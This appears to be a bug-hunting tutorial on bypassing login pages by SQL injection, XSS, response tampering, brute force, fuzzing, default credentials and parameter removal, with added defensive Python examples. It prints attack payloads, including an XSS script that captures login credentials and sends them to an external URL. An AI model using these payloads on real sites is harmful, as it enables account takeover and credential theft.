Hello to all beginner bug hunting fellows. This is Rocky, and today I have come with another blog on login pages. This blog is about bypassing the login page functionality, which is possible because of weaknesses in the site. There are many ways to bypass a login page, but in this blog we discuss some of the common ones. So let's start...

We are talking about these seven ways:

  1. Bypass by SQL Injection
  2. By Cross-Site Scripting (XSS)
  3. By Manipulating the Response
  4. Bypass by Brute Force Attack
  5. Bypass by Directory Fuzzing Attack
  6. Bypass by Default credentials
  7. By Removing Parameter in Request

Bypass by SQL Injection

I am taking an example of Mutillidae for demonstration.

Since the login form throws a SQL syntax error on malformed input, the user input is reaching the query unescaped, so now we can put a SQL injection payload in it. The payload for this case is ' or 1=1-- (note the trailing space after the two dashes). Now let's see what happens when we enter it.

Boooom!! We are logged in as admin. If it does not work in your case, try other payloads, and also use the SQLMap tool to dump the usernames and passwords.
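Why the payload works, and why a parameterised query stops it: the following is an added example (not code from the post or from Mutillidae) that runs the same ' or 1=1-- payload against a string-built query and against a bound-parameter query on a constructed SQLite table. The table, the account name and the password are all made up for the demo.

```python
import sqlite3

# The tautology payload from the post: closes the string literal, ORs in an
# always-true condition, and comments out the rest of the WHERE clause.
PAYLOAD = "' or 1=1-- "


def make_db():
    """Build an in-memory accounts table with one constructed admin row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT PRIMARY KEY, password TEXT)")
    # Plaintext password is for the demo only; a real system stores a salted hash.
    conn.execute("INSERT INTO accounts VALUES ('admin', 'demo-password-123')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String-built query: user input becomes part of the SQL grammar.
    With PAYLOAD as the username the query collapses to
    ... WHERE username = '' or 1=1-- ' AND password = '...'
    and the password check is commented away."""
    query = (
        "SELECT username FROM accounts WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: the input is bound as data and cannot change the SQL."""
    row = conn.execute(
        "SELECT username FROM accounts WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo():
    """Return both outcomes for the same payload so the difference is visible."""
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, PAYLOAD, "anything"),
        "safe": login_safe(conn, PAYLOAD, "anything"),
        "legit_safe": login_safe(conn, "admin", "demo-password-123"),
    }


if __name__ == "__main__":
    print(demo())
```

The vulnerable version returns the admin row for the payload; the parameterised version returns nothing for it and still works for the real credentials. Binding parameters, not input filtering, is the fix that closes the whole class.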

By Cross-Site Scripting (XSS)

Enter the XSS payload <script>alert(1)</script>. If the popup appears, the page reflects script unescaped, which means an attacker could inject a script that hooks the login form and captures the victim's credentials (the post calls this CSRF via XSS). This is the payload the post shows for it:

<script>
function intercept() {
  var user = document.forms[0].elements[0].value;
  var pass = document.forms[0].elements[1].value;

  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://your-target-url?username/email=" + user + "&password=" + pass);
  xhr.send();
  return false;
}
document.forms[0].onsubmit = intercept;
</script>

By Manipulating the Response

This method is mainly based on manipulating the response status code and the response body. First, make an account on your target, log in with the correct credentials, intercept the request in Burp Suite and analyse the response. After that, try to log in with wrong credentials and rewrite the response so it looks like the one you saw with your correct credentials, for example:

Response for wrong credentials:

403 Forbidden
<redacted>
{"error":true, "message":"Invalid Token"}

Response for correct credentials (what you rewrite it to):

200 OK
<redacted>
{"success":true}

If this weakness exists, you will be logged in to the site.

Bypass by Brute Force Attack

This attack mainly works when the site does not set a time limit or a retry limit, i.e. it has no delay or lockout on the login page. When you repeatedly enter wrong credentials and the site shows a message like "try again after 5 minutes", that kind of error makes this method difficult. I have written a blog about brute force attacks; its link is given below, see it for how to do this attack.
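The retry limit the paragraph above talks about, implemented on the server side: this is an added example, not code from the post, showing a per-username sliding-window lockout with an injectable clock so the behaviour can be checked without sleeping. The credential store, account name and password are constructed for the demo.

```python
import hmac
import time
from collections import defaultdict, deque


class LoginThrottle:
    """Sliding-window failure counter: after max_failures wrong attempts within
    lockout_seconds, further attempts for that username are refused until the
    oldest failure ages out. `clock` is injectable so tests need not sleep."""

    def __init__(self, max_failures=5, lockout_seconds=300, clock=time.monotonic):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.clock = clock
        self._failures = defaultdict(deque)  # username -> timestamps of recent failures

    def _prune(self, username, now):
        q = self._failures[username]
        while q and now - q[0] > self.lockout_seconds:
            q.popleft()

    def seconds_until_allowed(self, username):
        """0 when an attempt may proceed, otherwise the remaining lockout time."""
        now = self.clock()
        self._prune(username, now)
        q = self._failures[username]
        if len(q) >= self.max_failures:
            return self.lockout_seconds - (now - q[0])
        return 0

    def record_failure(self, username):
        self._failures[username].append(self.clock())

    def record_success(self, username):
        self._failures.pop(username, None)


# Constructed demo credential store (plaintext only for brevity; hash in practice).
CREDENTIALS = {"rocky": "demo-password-123"}


def attempt_login(throttle, username, password):
    """Returns ("locked", seconds_left), ("denied", 0) or ("ok", 0)."""
    wait = throttle.seconds_until_allowed(username)
    if wait > 0:
        return ("locked", wait)
    stored = CREDENTIALS.get(username, "")
    # compare_digest keeps the comparison time independent of where the strings differ
    if stored and hmac.compare_digest(stored.encode(), password.encode()):
        throttle.record_success(username)
        return ("ok", 0)
    throttle.record_failure(username)
    return ("denied", 0)


class FakeClock:
    """Manually advanced clock for the walkthrough below."""

    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now


def simulate():
    """Five wrong guesses, a sixth that is locked out, then a correct login
    once the 300-second window has passed."""
    clock = FakeClock()
    throttle = LoginThrottle(max_failures=5, lockout_seconds=300, clock=clock)
    results = [attempt_login(throttle, "rocky", "guess%d" % i) for i in range(5)]
    results.append(attempt_login(throttle, "rocky", "guess5"))
    clock.now = 301.0  # the lockout window has elapsed
    results.append(attempt_login(throttle, "rocky", "demo-password-123"))
    return results


if __name__ == "__main__":
    for r in simulate():
        print(r)
```

A per-username counter alone lets an attacker lock other people out by guessing against their names, so production deployments pair it with a per-source-IP limit and, ideally, a CAPTCHA or step-up challenge rather than a hard lock.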

Bypass by Directory Fuzzing Attack

In this method, we do directory brute forcing with the help of tools like ffuf, DirBuster and Burp Suite Intruder. Most of these tools come with their own directory wordlist; when a tool does not, Linux pentesting distributions ship wordlists you can use, and for Windows you can search for one on Google.

In this attack the tool may find a directory or subdirectory that returns a useful response, or that opens a page which should only be reachable after logging in to the site. I have used the ffuf tool in this blog so you can see how it works.
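Both of the last two techniques (rewriting the login response, and fuzzing for pages that should be behind the login) fail against a server that keeps the authentication decision on its own side. This is an added example, not code from the post, of the pattern: a session token is only ever issued by the server after a successful password check, and every protected path re-validates that token instead of trusting anything the client reports. The server key, the account and the protected paths are all constructed for the demo.

```python
import hashlib
import hmac
import os

SERVER_KEY = os.urandom(32)                     # per-process signing secret (demo)
PROTECTED_PATHS = {"/admin", "/dashboard", "/api/users"}


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


_SALT = os.urandom(16)
ACCOUNTS = {"alice": (_SALT, hash_password("demo-password-123", _SALT))}  # constructed


def issue_session(username):
    """Session token = username plus an HMAC over it under the server key."""
    mac = hmac.new(SERVER_KEY, username.encode(), hashlib.sha256).hexdigest()
    return f"{username}.{mac}"


def verify_session(token):
    """Return the username for a genuine token, None for anything else."""
    if not token or "." not in token:
        return None
    username, mac = token.rsplit(".", 1)
    expected = hmac.new(SERVER_KEY, username.encode(), hashlib.sha256).hexdigest()
    return username if hmac.compare_digest(mac, expected) else None


def login(username, password):
    """Returns (status, body, session_token). The token exists only on success."""
    record = ACCOUNTS.get(username)
    if record and hmac.compare_digest(record[1], hash_password(password, record[0])):
        return 200, {"success": True}, issue_session(username)
    return 403, {"error": True, "message": "Invalid credentials"}, None


def serve(path, session_token=None):
    """Every protected path re-checks the session; nothing depends on the
    login response body the client saw."""
    if path in PROTECTED_PATHS:
        user = verify_session(session_token)
        if user is None:
            return 401, {"error": True, "message": "login required"}
        return 200, {"page": path, "user": user}
    return 200, {"page": path}


def tampered_client_flow():
    """An intercepting proxy rewrites the failed login's 403 into
    200 {"success": true}. The server never issued a token, so the
    protected page still answers 401."""
    _, _, token = login("alice", "wrong-password")
    forged_status, forged_body = 200, {"success": True}  # client-side edit only
    return serve("/admin", token)


def fuzzed_paths():
    """Directory fuzzing can discover the protected paths, but each one
    refuses an unauthenticated request."""
    return {path: serve(path)[0] for path in sorted(PROTECTED_PATHS)}


if __name__ == "__main__":
    print(tampered_client_flow())
    print(fuzzed_paths())
```

When you test a target and the response rewrite does log you in, the root cause is that the front end, not the server, decides what an authenticated user is; the fix is the server-side check above, not a harder-to-edit response body.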

Bypass by Default credentials

When developers build a site, they often create default credentials for testing. Many times they remove them, and many times they forget to remove them from the records. Also, when the site allows any password to be set, many users choose weak passwords and the site accepts them. So you should try the default credentials; lists of default credentials are easily available on Google. Examples are admin:admin, admin:password, username:pass12345 and so on.

By Removing Parameter in Request

When you enter wrong credentials and the site shows an error like "username and password are incorrect / do not match" or "password is incorrect for this username", you can try this method. First intercept the request, remove the password parameter from it, and forward the request. If the server only checks that the username exists, it logs you in to the site. This problem occurs when the server does not validate the request properly.
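The last two sections (default credentials and the dropped password parameter) come down to two server-side checks. The following is an added example, not code from the post, showing a login handler with the parameter-skipping flaw beside a hardened one that requires both fields before any credential logic runs, plus a defender-side audit that reports which stored accounts still accept one of the default pairs the post lists. The account store is constructed for the demo; the hashing is PBKDF2 from the standard library.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_account(password):
    salt = os.urandom(16)
    return salt, hash_password(password, salt)


# Constructed store: one account with a real password, one still on a default.
ACCOUNTS = {
    "rocky": make_account("demo-password-123"),
    "admin": make_account("admin"),
}

# The default pairs mentioned in the post, used here as an audit list.
DEFAULT_CREDENTIALS = [("admin", "admin"), ("admin", "password"), ("username", "pass12345")]


def verify(username, password):
    record = ACCOUNTS.get(username)
    if record is None:
        return False
    salt, stored = record
    return hmac.compare_digest(stored, hash_password(password, salt))


def handle_login_flawed(form):
    """The bug the post describes: the password is only verified when the
    field was sent, so dropping the parameter skips the check entirely."""
    username = form.get("username")
    if username not in ACCOUNTS:
        return 403, {"error": True, "message": "username or password incorrect"}
    if "password" in form and not verify(username, form["password"]):
        return 403, {"error": True, "message": "username or password incorrect"}
    return 200, {"success": True}


def handle_login(form):
    """Hardened: both fields are required before any credential logic runs,
    and a missing field is a 400, never an implicit success. The same error
    text is returned for unknown users and wrong passwords."""
    username = form.get("username")
    password = form.get("password")
    if not username or not password:
        return 400, {"error": True, "message": "username and password are required"}
    if not verify(username, password):
        return 403, {"error": True, "message": "username or password incorrect"}
    return 200, {"success": True}


def audit_default_credentials():
    """Defender-side check: which accounts still accept a known default password?"""
    return sorted({u for u, p in DEFAULT_CREDENTIALS if verify(u, p)})


if __name__ == "__main__":
    print(handle_login_flawed({"username": "rocky"}))   # flawed: logged in with no password
    print(handle_login({"username": "rocky"}))           # hardened: 400
    print(audit_default_credentials())                   # ['admin']
```

Running the audit against a real user table is cheap and catches the leftover test accounts the post talks about before someone else does; forcing a password change for the flagged accounts closes that finding.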

These are some of the ways; hopefully you enjoyed it and learned something new from this blog. That's it for today's blog, see you in the next one. Thank You For Reading.
